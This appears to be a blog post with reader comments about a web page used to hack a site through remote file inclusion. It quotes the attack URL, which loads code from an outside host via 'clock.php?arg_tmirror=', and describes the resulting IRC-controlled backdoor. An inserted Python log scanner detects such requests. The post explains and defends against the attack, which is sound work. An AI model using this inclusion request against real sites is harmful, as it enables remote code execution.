My Baby’s Birth

You are probably reading this post, asking yourself “why does he even let me know”. So I will start by saying that my boy had his birthday a few months ago, so this post isn’t about him, it’s completely unrelated.

It has to do with this site: http://babycaleb.fort unecity.co.uk/ (I broke the link so people do not JUST jump and go to it)

This site isn’t mine; it was used to hack a friend’s web site, so I took it upon myself to look into it.

This site hosts a few pictures, some are quite weird to put online (hint to: My Wifes Scar), while others are completely harmless (hint to: My baby).

The issue is not in the pictures but rather what is there and cannot be seen without doing a bit of digging.

I will give some more hints in a follow-up post if no one else comes up with what this site does to you.

(Another hint, the site of my friend was hacked using this link: /clock.php?arg_tmirror=http://babycaleb.fortu necity.co.uk/index.htm)
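A defender who wants to find requests shaped like the one in the hint above can scan web-server access logs for query parameters whose value is a full URL on a foreign host. This is an added example, not code from this post; the log lines, host names and the function name `find_remote_url_params` are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (combined log format); all hosts and paths are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2008:10:01:02 +0000] "GET /clock.php?arg_tmirror=http://files.example.net/index.htm HTTP/1.1" 200 512 "-" "-"
198.51.100.4 - - [12/Mar/2008:10:01:09 +0000] "GET /clock.php?tz=UTC HTTP/1.1" 200 734 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2008:10:02:11 +0000] "GET /go.php?next=http%3A%2F%2Fwww.example.org%2Fhome HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2008:10:03:40 +0000] "GET /view.php?page=hTTp%3a%2f%2ffiles.example.net%2fa.txt%3f HTTP/1.1" 200 90 "-" "-"
"""

# Captures the client address and the request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_SCHEMES = {"http", "https", "ftp"}


def find_remote_url_params(log_text, own_hosts):
    """Return (client, path, parameter, remote_host) for each query parameter
    whose decoded value is an absolute URL on a host not listed in own_hosts."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line we understand
        client, target = match.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes each value, so encoded URLs are caught too.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            remote = urlsplit(value.strip())  # urlsplit lowercases the scheme
            if remote.scheme not in REMOTE_SCHEMES or not remote.hostname:
                continue
            host = remote.hostname.lower()
            if host not in own_hosts:  # legitimate redirects to our own site are skipped
                hits.append((client, parts.path, name, host))
    return hits


if __name__ == "__main__":
    for hit in find_remote_url_params(SAMPLE_LOG, own_hosts={"www.example.org"}):
        print("remote URL in parameter:", hit)
```

Passing the site's own host names in `own_hosts` keeps ordinary same-site redirect parameters out of the results.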

  • Nicolas

    Wouah… How many hours did you spend deobfuscating this code?

    Ok, it opens a socket to a predefined list of host names on port 8080, then sends some commands which look like IRC commands (USER, PASS, NICK). Then… well, it would require a couple more hours to figure out ;)

  • Nicolas

    Commands seem to be related to sending mail, browsing the file system, and executing shell commands on the infected host…